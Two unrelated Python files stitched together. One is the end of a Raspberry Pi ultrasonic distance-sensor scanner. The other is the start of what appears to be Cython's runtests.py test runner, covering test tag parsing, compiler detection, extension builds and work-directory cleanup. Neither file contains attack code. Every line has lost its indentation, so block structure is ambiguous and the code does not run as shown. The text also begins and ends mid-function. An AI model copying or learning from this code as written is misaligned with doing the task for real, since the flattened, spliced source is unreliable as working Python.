if frontStopTime - frontStartTime > 0.02:
frontError = True
break
time.sleep(0.08)
# Activate echo trigger (this is shared between front and rear sensors)
GPIO.output(self.GPIO_BACKTRIGGER, True)
time.sleep(0.00001)
GPIO.output(self.GPIO_BACKTRIGGER, False)
backStartTime = backStopTime = time.time()
while GPIO.input(self.GPIO_BACKECHO) == 0:
backStartTime = time.time()
if backStartTime - backStopTime > 0.02:
backError = True
break
while GPIO.input(self.GPIO_BACKECHO) == 1 and not (backError):
backStopTime = time.time()
if backStopTime - backStartTime > 0.02:
backError = True
break
# time difference between start and return
frontdistance = (frontStopTime - frontStartTime) * 17150
backdistance = (backStopTime - backStartTime) * 17150
if frontdistance > 0 and not(frontError):
self.frontDistance[self.frontServoDirection] = frontdistance
if backdistance> 0 and not(backError):
self.backDistance[self.backServoDirection] = backdistance
if (self.frontServoDirection == ServoDirection.Left):
self.UpdateStatistics()
# move servos to next direction to scan
servoDirections = self.servos.NextScanPosition()
self.frontServoDirection = servoDirections[0]
self.backServoDirection = servoDirections[1]
time.sleep(delay)
def StartScanner(self, delay, getFirstScan = False):
self.endthread = False
self.ultrathread = threading.Thread(target=self.GetDistance, args=(delay,))
self.ultrathread.start()
self.scannerActive = True
if getFirstScan:
done = False
attempts = 3
while not(done) and attempts > 0:
time.sleep(delay * 5)
done = True
for key in self.frontDistance:
if self.frontDistance[key] == -1.0:
done = False
for key in self.backDistance:
if self.backDistance[key] == -1.0:
done = False
attempts -= 1
return done
else:
return True
def StopScanner(self):
self.endthread = True
self.ultrathread.join()
self.scannerActive = False
try:
sensors = DistanceSensors()
sensors.StartScanner(0.1, True)
while sensors.scannerActive:
# if keyboard.read_key() == 'e':
# sensors.StopScanner()
# print("Front")
# print(sensors.frontDistance)
# print("back")
# print(sensors.backDistance)
time.sleep(1)
print("Back", sensors.BackDeltaDelta, sensors.BackDeltas[-1])
print("Front", sensors.FrontDeltaDelta, sensors.FrontDeltas[-1])
# Reset by pressing CTRL + C
except KeyboardInterrupt:
sensors.StopScanner()
finally:
GPIO.cleanup()
|
runtests.py
|
#!/usr/bin/env python
from __future__ import print_function
import atexit
import base64
import os
import sys
import re
import gc
import heapq
import locale
import shutil
import time
import unittest
import doctest
import operator
import subprocess
import tempfile
import traceback
import warnings
import zlib
import glob
from contextlib import contextmanager
try:
import platform
IS_PYPY = platform.python_implementation() == 'PyPy'
IS_CPYTHON = platform.python_implementation() == 'CPython'
except (ImportError, AttributeError):
IS_CPYTHON = True
IS_PYPY = False
IS_PY2 = sys.version_info[0] < 3
from io import open as io_open
try:
from StringIO import StringIO
except ImportError:
from io import StringIO # doesn't accept 'str' in Py2
try:
import cPickle as pickle
except ImportError:
import pickle
try:
import threading
except ImportError: # No threads, no problems
threading = None
try:
from collections import defaultdict
except ImportError:
class defaultdict(object):
def __init__(self, default_factory=lambda : None):
self._dict = {}
self.default_factory = default_factory
def __getitem__(self, key):
if key not in self._dict:
self._dict[key] = self.default_factory()
return self._dict[key]
def __setitem__(self, key, value):
self._dict[key] = value
def __contains__(self, key):
return key in self._dict
def __repr__(self):
return repr(self._dict)
def __nonzero__(self):
return bool(self._dict)
try:
from unittest import SkipTest
except ImportError:
class SkipTest(Exception): # don't raise, only provided to allow except-ing it!
pass
def skip_test(reason):
sys.stderr.write("Skipping test: %s\n" % reason)
else:
def skip_test(reason):
raise SkipTest(reason)
try:
basestring
except NameError:
basestring = str
WITH_CYTHON = True
CY3_DIR = None
from distutils.command.build_ext import build_ext as _build_ext
from distutils import sysconfig
from distutils import ccompiler
_to_clean = []
@atexit.register
def _cleanup_files():
"""
This is only used on Cygwin to clean up shared libraries that are unsafe
to delete while the test suite is running.
"""
for filename in _to_clean:
if os.path.isdir(filename):
shutil.rmtree(filename, ignore_errors=True)
else:
try:
os.remove(filename)
except OSError:
pass
def get_distutils_distro(_cache=[]):
if _cache:
return _cache[0]
# late import to accommodate for setuptools override
from distutils.dist import Distribution
distutils_distro = Distribution()
if sys.platform == 'win32':
# TODO: Figure out why this hackery (see https://thread.gmane.org/gmane.comp.python.cython.devel/8280/).
config_files = distutils_distro.find_config_files()
try:
config_files.remove('setup.cfg')
except ValueError:
pass
distutils_distro.parse_config_files(config_files)
cfgfiles = distutils_distro.find_config_files()
try:
cfgfiles.remove('setup.cfg')
except ValueError:
pass
distutils_distro.parse_config_files(cfgfiles)
_cache.append(distutils_distro)
return distutils_distro
EXT_DEP_MODULES = {
'tag:numpy': 'numpy',
'tag:pythran': 'pythran',
'tag:setuptools': 'setuptools.sandbox',
'tag:asyncio': 'asyncio',
'tag:pstats': 'pstats',
'tag:posix': 'posix',
'tag:array': 'array',
'tag:coverage': 'Cython.Coverage',
'Coverage': 'Cython.Coverage',
'tag:ipython': 'IPython.testing.globalipapp',
'tag:jedi': 'jedi_BROKEN_AND_DISABLED',
'tag:test.support': 'test.support', # support module for CPython unit tests
}
def patch_inspect_isfunction():
import inspect
orig_isfunction = inspect.isfunction
def isfunction(obj):
return orig_isfunction(obj) or type(obj).__name__ == 'cython_function_or_method'
isfunction._orig_isfunction = orig_isfunction
inspect.isfunction = isfunction
def unpatch_inspect_isfunction():
import inspect
try:
orig_isfunction = inspect.isfunction._orig_isfunction
except AttributeError:
pass
else:
inspect.isfunction = orig_isfunction
def def_to_cdef(source):
'''
Converts the module-level def methods into cdef methods, i.e.
@decorator
def foo([args]):
"""
[tests]
"""
[body]
becomes
def foo([args]):
"""
[tests]
"""
return foo_c([args])
cdef foo_c([args]):
[body]
'''
output = []
skip = False
def_node = re.compile(r'def (\w+)\(([^()*]*)\):').match
lines = iter(source.split('\n'))
for line in lines:
if not line.strip():
output.append(line)
continue
if skip:
if line[0] != ' ':
skip = False
else:
continue
if line[0] == '@':
skip = True
continue
m = def_node(line)
if m:
name = m.group(1)
args = m.group(2)
if args:
args_no_types = ", ".join(arg.split()[-1] for arg in args.split(','))
else:
args_no_types = ""
output.append("def %s(%s):" % (name, args_no_types))
line = next(lines)
if '"""' in line:
has_docstring = True
output.append(line)
for line in lines:
output.append(line)
if '"""' in line:
break
else:
has_docstring = False
output.append(" return %s_c(%s)" % (name, args_no_types))
output.append('')
output.append("cdef %s_c(%s):" % (name, args))
if not has_docstring:
output.append(line)
else:
output.append(line)
return '\n'.join(output)
def exclude_extension_in_pyver(*versions):
def check(ext):
return EXCLUDE_EXT if sys.version_info[:2] in versions else ext
return check
def exclude_extension_on_platform(*platforms):
def check(ext):
return EXCLUDE_EXT if sys.platform in platforms else ext
return check
def update_linetrace_extension(ext):
ext.define_macros.append(('CYTHON_TRACE', 1))
return ext
def update_numpy_extension(ext, set_api17_macro=True):
import numpy
from numpy.distutils.misc_util import get_info
ext.include_dirs.append(numpy.get_include())
if set_api17_macro:
ext.define_macros.append(('NPY_NO_DEPRECATED_API', 'NPY_1_7_API_VERSION'))
# We need the npymath library for numpy.math.
# This is typically a static-only library.
for attr, value in get_info('npymath').items():
getattr(ext, attr).extend(value)
def update_openmp_extension(ext):
ext.openmp = True
language = ext.language
if sys.platform == 'win32' and sys.version_info[:2] == (3,4):
# OpenMP tests fail in appveyor in Py3.4 -> just ignore them, EoL of Py3.4 is early 2019...
return EXCLUDE_EXT
if language == 'cpp':
flags = OPENMP_CPP_COMPILER_FLAGS
else:
flags = OPENMP_C_COMPILER_FLAGS
if flags:
compile_flags, link_flags = flags
ext.extra_compile_args.extend(compile_flags.split())
ext.extra_link_args.extend(link_flags.split())
return ext
elif sys.platform == 'win32':
return ext
return EXCLUDE_EXT
def update_cpp11_extension(ext):
"""
update cpp11 extensions that will run on versions of gcc >4.8
"""
gcc_version = get_gcc_version(ext.language)
if gcc_version:
compiler_version = gcc_version.group(1)
if float(compiler_version) > 4.8:
ext.extra_compile_args.append("-std=c++11")
return ext
clang_version = get_clang_version(ext.language)
if clang_version:
ext.extra_compile_args.append("-std=c++11")
if sys.platform == "darwin":
ext.extra_compile_args.append("-stdlib=libc++")
ext.extra_compile_args.append("-mmacosx-version-min=10.7")
return ext
return EXCLUDE_EXT
def get_cc_version(language):
"""
finds gcc version using Popen
"""
if language == 'cpp':
cc = sysconfig.get_config_var('CXX')
else:
cc = sysconfig.get_config_var('CC')
if not cc:
cc = ccompiler.get_default_compiler()
if not cc:
return ''
# For some reason, cc can be e.g. 'gcc -pthread'
cc = cc.split()[0]
# Force english output
env = os.environ.copy()
env['LC_MESSAGES'] = 'C'
try:
p = subprocess.Popen([cc, "-v"], stderr=subprocess.PIPE, env=env)
except EnvironmentError:
# Be compatible with Python 3
warnings.warn("Unable to find the %s compiler: %s: %s" %
(language, os.strerror(sys.exc_info()[1].errno), cc))
return ''
_, output = p.communicate()
return output.decode(locale.getpreferredencoding() or 'ASCII', 'replace')
def get_gcc_version(language):
matcher = re.compile(r"gcc version (\d+\.\d+)").search
return matcher(get_cc_version(language))
def get_clang_version(language):
matcher = re.compile(r"clang(?:-|\s+version\s+)(\d+\.\d+)").search
return matcher(get_cc_version(language))
def get_openmp_compiler_flags(language):
"""
As of gcc 4.2, it supports OpenMP 2.5. Gcc 4.4 implements 3.0. We don't
(currently) check for other compilers.
returns a two-tuple of (CFLAGS, LDFLAGS) to build the OpenMP extension
"""
gcc_version = get_gcc_version(language)
if not gcc_version:
if sys.platform == 'win32':
return '/openmp', ''
else:
return None # not gcc - FIXME: do something about other compilers
# gcc defines "__int128_t", assume that at least all 64 bit architectures have it
global COMPILER_HAS_INT128
COMPILER_HAS_INT128 = getattr(sys, 'maxsize', getattr(sys, 'maxint', 0)) > 2**60
compiler_version = gcc_version.group(1)
if compiler_version and compiler_version.split('.') >= ['4', '2']:
return '-fopenmp', '-fopenmp'
try:
locale.setlocale(locale.LC_ALL, '')
except locale.Error:
pass
COMPILER = None
COMPILER_HAS_INT128 = False
OPENMP_C_COMPILER_FLAGS = get_openmp_compiler_flags('c')
OPENMP_CPP_COMPILER_FLAGS = get_openmp_compiler_flags('cpp')
# Return this from the EXT_EXTRAS matcher callback to exclude the extension
EXCLUDE_EXT = object()
EXT_EXTRAS = {
'tag:numpy' : update_numpy_extension,
'tag:openmp': update_openmp_extension,
'tag:cpp11': update_cpp11_extension,
'tag:trace' : update_linetrace_extension,
'tag:bytesformat': exclude_extension_in_pyver((3, 3), (3, 4)), # no %-bytes formatting
'tag:no-macos': exclude_extension_on_platform('darwin'),
}
# TODO: use tags
VER_DEP_MODULES = {
# tests are excluded if 'CurrentPythonVersion OP VersionTuple', i.e.
# (2,4) : (operator.lt, ...) excludes ... when PyVer < 2.4.x
# The next line should start (3,); but this is a dictionary, so
# we can only have one (3,) key. Since 2.7 is supposed to be the
# last 2.x release, things would have to change drastically for this
# to be unsafe...
(2,999): (operator.lt, lambda x: x in ['run.special_methods_T561_py3',
'run.test_raisefrom',
'run.different_package_names',
'run.unicode_imports', # encoding problems on appveyor in Py2
'run.reimport_failure', # reimports don't do anything in Py2
]),
(3,): (operator.ge, lambda x: x in ['run.non_future_division',
'compile.extsetslice',
'compile.extdelslice',
'run.special_methods_T561_py2',
]),
(3,3) : (operator.lt, lambda x: x in ['build.package_compilation',
'build.cythonize_pep420_namespace',
'run.yield_from_py33',
'pyximport.pyximport_namespace',
'run.qualname',
]),
(3,4): (operator.lt, lambda x: x in ['run.py34_signature',
'run.test_unicode', # taken from Py3.7, difficult to backport
]),
(3,4,999): (operator.gt, lambda x: x in ['run.initial_file_path',
]),
(3,5): (operator.lt, lambda x: x in ['run.py35_pep492_interop',
'run.py35_asyncio_async_def',
'run.mod__spec__',
'run.pep526_variable_annotations', # typing module
'run.test_exceptions', # copied from Py3.7+
]),
}
INCLUDE_DIRS = [ d for d in os.getenv('INCLUDE', '').split(os.pathsep) if d ]
CFLAGS = os.getenv('CFLAGS', '').split()
CCACHE = os.getenv('CYTHON_RUNTESTS_CCACHE', '').split()
TEST_SUPPORT_DIR = 'testsupport'
BACKENDS = ['c', 'cpp']
UTF8_BOM_BYTES = r'\xef\xbb\xbf'.encode('ISO-8859-1').decode('unicode_escape')
def memoize(f):
uncomputed = object()
f._cache = {}
def func(*args):
res = f._cache.get(args, uncomputed)
if res is uncomputed:
res = f._cache[args] = f(*args)
return res
return func
@memoize
def parse_tags(filepath):
tags = defaultdict(list)
parse_tag = re.compile(r'#\s*(\w+)\s*:(.*)$').match
with io_open(filepath, encoding='ISO-8859-1', errors='ignore') as f:
for line in f:
# ignore BOM-like bytes and whitespace
line = line.lstrip(UTF8_BOM_BYTES).strip()
if not line:
if tags:
break # assume all tags are in one block
else:
continue
if line[0] != '#':
break
parsed = parse_tag(line)
if parsed:
tag, values = parsed.groups()
if tag in ('coding', 'encoding'):
continue
if tag == 'tags':
tag = 'tag'
print("WARNING: test tags use the 'tag' directive, not 'tags' (%s)" % filepath)
if tag not in ('mode', 'tag', 'ticket', 'cython', 'distutils', 'preparse'):
print("WARNING: unknown test directive '%s' found (%s)" % (tag, filepath))
values = values.split(',')
tags[tag].extend(filter(None, [value.strip() for value in values]))
elif tags:
break # assume all tags are in one block
return tags
list_unchanging_dir = memoize(lambda x: os.listdir(x))
@memoize
def _list_pyregr_data_files(test_directory):
is_data_file = re.compile('(?:[.](txt|pem|db|html)|^bad.*[.]py)$').search
return ['__init__.py'] + [
filename for filename in list_unchanging_dir(test_directory)
if is_data_file(filename)]
def import_ext(module_name, file_path=None):
if file_path:
import imp
return imp.load_dynamic(module_name, file_path)
else:
try:
from importlib import invalidate_caches
except ImportError:
pass
else:
invalidate_caches()
return __import__(module_name, globals(), locals(), ['*'])
class build_ext(_build_ext):
def build_extension(self, ext):
try:
try: # Py2.7+ & Py3.2+
compiler_obj = self.compiler_obj
except AttributeError:
compiler_obj = self.compiler
if ext.language == 'c++':
compiler_obj.compiler_so.remove('-Wstrict-prototypes')
if CCACHE:
compiler_obj.compiler_so = CCACHE + compiler_obj.compiler_so
if getattr(ext, 'openmp', None) and compiler_obj.compiler_type == 'msvc':
ext.extra_compile_args.append('/openmp')
except Exception:
pass
_build_ext.build_extension(self, ext)
class ErrorWriter(object):
match_error = re.compile(r'(warning:)?(?:.*:)?\s*([-0-9]+)\s*:\s*([-0-9]+)\s*:\s*(.*)').match
def __init__(self, encoding=None):
self.output = []
self.encoding = encoding
def write(self, value):
if self.encoding:
value = value.encode('ISO-8859-1').decode(self.encoding)
self.output.append(value)
def _collect(self):
s = ''.join(self.output)
results = {'errors': [], 'warnings': []}
for line in s.splitlines():
match = self.match_error(line)
if match:
is_warning, line, column, message = match.groups()
results['warnings' if is_warning else 'errors'].append((int(line), int(column), message.strip()))
return [["%d:%d: %s" % values for values in sorted(results[key])] for key in ('errors', 'warnings')]
def geterrors(self):
return self._collect()[0]
def getwarnings(self):
return self._collect()[1]
def getall(self):
return self._collect()
def close(self):
pass # ignore, only to match file-like interface
class Stats(object):
def __init__(self, top_n=8):
self.top_n = top_n
self.test_counts = defaultdict(int)
self.test_times = defaultdict(float)
self.top_tests = defaultdict(list)
def add_time(self, name, language, metric, t):
self.test_counts[metric] += 1
self.test_times[metric] += t
top = self.top_tests[metric]
push = heapq.heappushpop if len(top) >= self.top_n else heapq.heappush
# min-heap => pop smallest/shortest until longest times remain
push(top, (t, name, language))
@contextmanager
def time(self, name, language, metric):
t = time.time()
yield
t = time.time() - t
self.add_time(name, language, metric, t)
def update(self, stats):
# type: (Stats) -> None
for metric, t in stats.test_times.items():
self.test_times[metric] += t
self.test_counts[metric] += stats.test_counts[metric]
top = self.top_tests[metric]
for entry in stats.top_tests[metric]:
push = heapq.heappushpop if len(top) >= self.top_n else heapq.heappush
push(top, entry)
def print_stats(self, out=sys.stderr):
if not self.test_times:
return
lines = ['Times:\n']
for metric, t in sorted(self.test_times.items()):
count = self.test_counts[metric]
top = self.top_tests[metric]
lines.append("%-12s: %8.2f sec (%4d, %6.3f / run) - slowest: %s\n" % (
metric, t, count, t / count,
', '.join("'{2}:{1}' ({0:.2f}s)".format(*item) for item in heapq.nlargest(self.top_n, top))))
out.write(''.join(lines))
class TestBuilder(object):
def __init__(self, rootdir, workdir, selectors, exclude_selectors, options,
with_pyregr, languages, test_bugs, language_level,
common_utility_dir, pythran_dir=None,
default_mode='run', stats=None,
add_embedded_test=False):
self.rootdir = rootdir
self.workdir = workdir
self.selectors = selectors
self.exclude_selectors = exclude_selectors
self.annotate = options.annotate_source
self.cleanup_workdir = options.cleanup_workdir
self.cleanup_sharedlibs = options.cleanup_sharedlibs
self.cleanup_failures = options.cleanup_failures
self.with_pyregr = with_pyregr
self.cython_only = options.cython_only
self.languages = languages
self.test_bugs = test_bugs
self.fork = options.fork
self.language_level = language_level
self.test_determinism = options.test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.default_mode = default_mode
self.stats = stats
self.add_embedded_test = add_embedded_test
self.capture = options.capture
def build_suite(self):
suite = unittest.TestSuite()
filenames = os.listdir(self.rootdir)
filenames.sort()
for filename in filenames:
path = os.path.join(self.rootdir, filename)
if os.path.isdir(path) and filename != TEST_SUPPORT_DIR:
if filename == 'pyregr' and not self.with_pyregr:
continue
if filename == 'broken' and not self.test_bugs:
continue
suite.addTest(
self.handle_directory(path, filename))
if sys.platform not in ['win32'] and self.add_embedded_test:
# Non-Windows makefile.
if [1 for selector in self.selectors if selector("embedded")] \
and not [1 for selector in self.exclude_selectors if selector("embedded")]:
suite.addTest(unittest.makeSuite(EmbedTest))
return suite
def handle_directory(self, path, context):
workdir = os.path.join(self.workdir, context)
if not os.path.exists(workdir):
os.makedirs(workdir)
suite = unittest.TestSuite()
filenames = list_unchanging_dir(path)
filenames.sort()
for filename in filenames:
filepath = os.path.join(path, filename)
module, ext = os.path.splitext(filename)
if ext not in ('.py', '.pyx', '.srctree'):
continue
if filename.startswith('.'):
continue # certain emacs backup files
if context == 'pyregr':
tags = defaultdict(list)
else:
tags = parse_tags(filepath)
fqmodule = "%s.%s" % (context, module)
if not [ 1 for match in self.selectors
if match(fqmodule, tags) ]:
continue
if self.exclude_selectors:
if [1 for match in self.exclude_selectors
if match(fqmodule, tags)]:
continue
mode = self.default_mode
if tags['mode']:
mode = tags['mode'][0]
elif context == 'pyregr':
mode = 'pyregr'
if ext == '.srctree':
if 'cpp' not in tags['tag'] or 'cpp' in self.languages:
suite.addTest(EndToEndTest(filepath, workdir,
self.cleanup_workdir, stats=self.stats,
capture=self.capture))
continue
# Choose the test suite.
if mode == 'pyregr':
if not filename.startswith('test_'):
continue
test_class = CythonPyregrTestCase
elif mode == 'run':
if module.startswith("test_"):
test_class = CythonUnitTestCase
else:
test_class = CythonRunTestCase
elif mode in ['compile', 'error']:
test_class = CythonCompileTestCase
else:
raise KeyError('Invalid test mode: ' + mode)
for test in self.build_tests(test_class, path, workdir,
module, mode == 'error', tags):
suite.addTest(test)
if mode == 'run' and ext == '.py' and not self.cython_only and not filename.startswith('test_'):
# additionally test file in real Python
min_py_ver = [
(int(pyver.group(1)), int(pyver.group(2)))
for pyver in map(re.compile(r'pure([0-9]+)[.]([0-9]+)').match, tags['tag'])
if pyver
]
if not min_py_ver or any(sys.version_info >= min_ver for min_ver in min_py_ver):
suite.addTest(PureDoctestTestCase(module, os.path.join(path, filename), tags, stats=self.stats))
return suite
def build_tests(self, test_class, path, workdir, module, expect_errors, tags):
warning_errors = 'werror' in tags['tag']
expect_warnings = 'warnings' in tags['tag']
if expect_errors:
if skip_c(tags) and 'cpp' in self.languages:
languages = ['cpp']
else:
languages = self.languages[:1]
else:
languages = self.languages
if skip_c(tags) and 'c' in languages:
languages = list(languages)
languages.remove('c')
elif 'no-cpp' in tags['tag'] and 'cpp' in self.languages:
languages = list(languages)
languages.remove('cpp')
language_levels = [2, 3] if 'all_language_levels' in tags['tag'] else [None]
pythran_dir = self.pythran_dir
if 'pythran' in tags['tag'] and not pythran_dir and 'cpp' in languages:
import pythran.config
try:
pythran_ext = pythran.config.make_extension(python=True)
except TypeError: # old pythran version syntax
pythran_ext = pythran.config.make_extension()
pythran_dir = pythran_ext['include_dirs'][0]
preparse_list = tags.get('preparse', ['id'])
tests = [ self.build_test(test_class, path, workdir, module, tags, language, language_level,
expect_errors, expect_warnings, warning_errors, preparse,
pythran_dir if language == "cpp" else None)
for language in languages
for preparse in preparse_list
for language_level in language_levels
]
return tests
def build_test(self, test_class, path, workdir, module, tags, language, language_level,
expect_errors, expect_warnings, warning_errors, preparse, pythran_dir):
language_workdir = os.path.join(workdir, language)
if not os.path.exists(language_workdir):
os.makedirs(language_workdir)
workdir = os.path.join(language_workdir, module)
if preparse != 'id':
workdir += '_%s' % (preparse,)
if language_level:
workdir += '_cy%d' % (language_level,)
return test_class(path, workdir, module, tags,
language=language,
preparse=preparse,
expect_errors=expect_errors,
expect_warnings=expect_warnings,
annotate=self.annotate,
cleanup_workdir=self.cleanup_workdir,
cleanup_sharedlibs=self.cleanup_sharedlibs,
cleanup_failures=self.cleanup_failures,
cython_only=self.cython_only,
fork=self.fork,
language_level=language_level or self.language_level,
warning_errors=warning_errors,
test_determinism=self.test_determinism,
common_utility_dir=self.common_utility_dir,
pythran_dir=pythran_dir,
stats=self.stats)
def skip_c(tags):
if 'cpp' in tags['tag']:
return True
# We don't want to create a distutils key in the
# dictionary so we check before looping.
if 'distutils' in tags:
for option in tags['distutils']:
splitted = option.split('=')
if len(splitted) == 2:
argument, value = splitted
if argument.strip() == 'language' and value.strip() == 'c++':
return True
return False
def filter_stderr(stderr_bytes):
"""
Filter annoying warnings from output.
"""
if b"Command line warning D9025" in stderr_bytes:
# MSCV: cl : Command line warning D9025 : overriding '/Ox' with '/Od'
stderr_bytes = b'\n'.join(
line for line in stderr_bytes.splitlines()
if b"Command line warning D9025" not in line)
return stderr_bytes
class CythonCompileTestCase(unittest.TestCase):
def __init__(self, test_directory, workdir, module, tags, language='c', preparse='id',
expect_errors=False, expect_warnings=False, annotate=False, cleanup_workdir=True,
cleanup_sharedlibs=True, cleanup_failures=True, cython_only=False,
fork=True, language_level=2, warning_errors=False,
test_determinism=False,
common_utility_dir=None, pythran_dir=None, stats=None):
self.test_directory = test_directory
self.tags = tags
self.workdir = workdir
self.module = module
self.language = language
self.preparse = preparse
self.name = module if self.preparse == "id" else "%s_%s" % (module, preparse)
self.expect_errors = expect_errors
self.expect_warnings = expect_warnings
self.annotate = annotate
self.cleanup_workdir = cleanup_workdir
self.cleanup_sharedlibs = cleanup_sharedlibs
self.cleanup_failures = cleanup_failures
self.cython_only = cython_only
self.fork = fork
self.language_level = language_level
self.warning_errors = warning_errors
self.test_determinism = test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.stats = stats
unittest.TestCase.__init__(self)
def shortDescription(self):
return "compiling (%s%s%s) %s" % (
self.language,
"/cy2" if self.language_level == 2 else "/cy3" if self.language_level == 3 else "",
"/pythran" if self.pythran_dir is not None else "",
self.description_name()
)
def description_name(self):
return self.name
def setUp(self):
from Cython.Compiler import Options
self._saved_options = [
(name, getattr(Options, name))
for name in (
'warning_errors',
'clear_to_none',
'error_on_unknown_names',
'error_on_uninitialized',
# 'cache_builtins', # not currently supported due to incorrect global caching
)
]
self._saved_default_directives = list(Options.get_directive_defaults().items())
Options.warning_errors = self.warning_errors
if sys.version_info >= (3, 4):
Options._directive_defaults['autotestdict'] = False
if not os.path.exists(self.workdir):
os.makedirs(self.workdir)
if self.workdir not in sys.path:
sys.path.insert(0, self.workdir)
def tearDown(self):
from Cython.Compiler import Options
for name, value in self._saved_options:
setattr(Options, name, value)
Options._directive_defaults = dict(self._saved_default_directives)
unpatch_inspect_isfunction()
try:
sys.path.remove(self.workdir)
except ValueError:
pass
try:
del sys.modules[self.module]
except KeyError:
pass
cleanup = self.cleanup_failures or self.success
cleanup_c_files = WITH_CYTHON and self.cleanup_workdir and cleanup
cleanup_lib_files = self.cleanup_sharedlibs and cleanup
is_cygwin = sys.platform == 'cygwin'
if os.path.exists(self.workdir):
if cleanup_c_files and cleanup_lib_files and not is_cygwin:
shutil.rmtree(self.workdir, ignore_errors=True)
else:
for rmfile in os.listdir(self.workdir):
ext = os.path.splitext(rmfile)[1]
if not cleanup_c_files:
# Keep C, C++ files, header files, preprocessed sources
# and assembly sources (typically the .i and .s files
# are intentionally generated when -save-temps is given)
if ext in (".c", ".cpp", ".h", ".i", ".ii", ".s"):
continue
if ext == ".html" and rmfile.startswith(self.module):
continue
is_shared_obj = ext in (".so", ".dll")
if not cleanup_lib_files and is_shared_obj:
continue
try:
rmfile = os.path.join(self.workdir, rmfile)
if os.path.isdir(rmfile):
shutil.rmtree(rmfile, ignore_errors=True)
elif is_cygwin and is_shared_obj:
# Delete later
_to_clean.append(rmfile)
else:
os.remove(rmfile)
except IOError:
pass
if cleanup_c_files and cleanup_lib_files and is_cygwin:
# Finally, remove the work dir itself
_to_clean.append(self.workdir)
if cleanup_c_files and os.path.exists(self.workdir + '-again'):
shutil.rmtree(self.workdir + '-again', ignore_errors=True)
def runTest(self):
self.success = False
self.runCompileTest()
self.success = True
def runCompileTest(self):
return self.compile(
self.test_directory, self.module, self.workdir,
self.test_directory, self.expect_errors, self.expect_warnings, self.annotate)
def find_module_source_file(self, source_file):
if not os.path.exists(source_file):
source_file = source_file[:-1]
return source_file
def build_target_filename(self, module_name):
target = '%s.%s' % (module_name, self.language)
return target
def related_files(self, test_directory, module_name):
is_related = re.compile('%s_.*[.].*' % module_name).match
return [filename for filename in list_unchanging_dir(test_directory)
if is_related(filename)]
def copy_files(self, test_directory, target_directory, file_list):
if self.preparse and self.preparse != 'id':
preparse_func = globals()[self.preparse]
def copy(src, dest):
with open(src) as fin:
with open(dest, 'w') as fout:
fout.write(preparse_func(fin.read()))
else:
# use symlink on Unix, copy on Windows
try:
copy = os.symlink
except AttributeError:
copy = shutil.copy
join = os.path.join
for filename in file_list:
file_path = join(test_directory, filename)
if os.path.exists(file_path):
copy(file_path, join(target_directory, filename))
def source_files(self, workdir, module_name, file_list):
return ([self.build_target_filename(module_name)] +
[filename for filename in file_list
if not os.path.isfile(os.path.join(workdir, filename))])
def split_source_and_output(self, test_directory, module, workdir):
source_file = self.find_module_source_file(os.path.join(test_directory, module) + '.pyx')
from Cython.Utils import detect_opened_file_encoding
with io_open(source_file, 'rb') as f:
# encoding is passed to ErrorWriter but not used on the source
# since it is sometimes deliberately wrong
encoding = detect_opened_file_encoding(f, default=None)
with io_open(source_file, 'r', encoding='ISO-8859-1') as source_and_output:
error_writer = warnings_writer = None
out = io_open(os.path.join(workdir, module + os.path.splitext(source_file)[1]),
'w', encoding='ISO-8859-1')
try:
for line in source_and_output:
if line.startswith("_ERRORS"):
out.close()
out = error_writer = ErrorWriter(encoding=encoding)
elif line.startswith("_WARNINGS"):
out.close()
out = warnings_writer = ErrorWriter(encoding=encoding)
else:
out.write(line)
finally:
out.close()
return (error_writer.geterrors() if error_writer else [],
warnings_writer.geterrors() if warnings_writer else [])
def run_cython(self, test_directory, module, targetdir, incdir, annotate,
extra_compile_options=None):
include_dirs = INCLUDE_DIRS + [os.path.join(test_directory, '..', TEST_SUPPORT_DIR)]
if incdir:
include_dirs.append(incdir)
if self.preparse == 'id':
source = self.find_module_source_file(
os.path.join(test_directory, module + '.pyx'))
else:
self.copy_files(test_directory, targetdir, [module + '.pyx'])
source = os.path.join(targetdir, module + '.pyx')
target = os.path.join(targetdir, self.build_target_filename(module))
if extra_compile_options is None:
extra_compile_options = {}
if 'allow_unknown_names' in self.tags['tag']:
from Cython.Compiler import Options
Options.error_on_unknown_names = False
try:
CompilationOptions
except NameError:
from Cython.Compiler.Options import CompilationOptions
from Cython.Compiler.Main import compile as cython_compile
from Cython.Compiler.Options import default_options
common_utility_include_dir = self.common_utility_dir
options = CompilationOptions(
default_options,
include_path = include_dirs,
output_file = target,
annotate = annotate,
use_listing_file = False,
cplus = self.language == 'cpp',
np_pythran = self.pythran_dir is not None,
language_level = self.language_level,
generate_pxi = False,
evaluate_tree_assertions = True,
common_utility_include_dir = common_utility_include_dir,
**extra_compile_options
)
cython_compile(source, options=options,
full_module_name=module)
def run_distutils(self, test_directory, module, workdir, incdir,
extra_extension_args=None):
cwd = os.getcwd()
os.chdir(workdir)
try:
build_extension = build_ext(get_distutils_distro())
build_extension.include_dirs = INCLUDE_DIRS[:]
if incdir:
build_extension.include_dirs.append(incdir)
build_extension.finalize_options()
if COMPILER:
build_extension.compiler = COMPILER
ext_compile_flags = CFLAGS[:]
if build_extension.compiler == 'mingw32':
ext_compile_flags.append('-Wno-format')
if extra_extension_args is None:
extra_extension_args = {}
related_files = self.related_files(test_directory, module)
self.copy_files(test_directory, workdir, related_files)
from distutils.core import Extension
extension = Extension(
module,
sources=self.source_files(workdir, module, related_files),
extra_compile_args=ext_compile_flags,
**extra_extension_args
)
if self.language == 'cpp':
# Set the language now as the fixer might need it
extension.language = 'c++'
if 'distutils' in self.tags:
from Cython.Build.Dependencies import DistutilsInfo
from Cython.Utils import open_source_file
pyx_path = os.path.join(self.test_directory, self.module + ".pyx")
with open_source_file(pyx_path) as f:
DistutilsInfo(f).apply(extension)
if self.pythran_dir:
from Cython.Build.Dependencies import update_pythran_extension
update_pythran_extension(extension)
# Compile with -DCYTHON_CLINE_IN_TRACEBACK=1 unless we have
# the "traceback" tag
if 'traceback' not in self.tags['tag']:
extension.define_macros.append(("CYTHON_CLINE_IN_TRACEBACK", 1))
for matcher, fixer in list(EXT_EXTRAS.items()):
if isinstance(matcher, str):
# lazy init
del EXT_EXTRAS[matcher]
matcher = string_selector(matcher)
EXT_EXTRAS[matcher] = fixer
if matcher(module, self.tags):
newext = fixer(extension)
if newext is EXCLUDE_EXT:
return skip_test("Test '%s' excluded due to tags '%s'" % (
self.name, ', '.join(self.tags.get('tag', ''))))
extension = newext or extension
if self.language == 'cpp':
extension.language = 'c++'
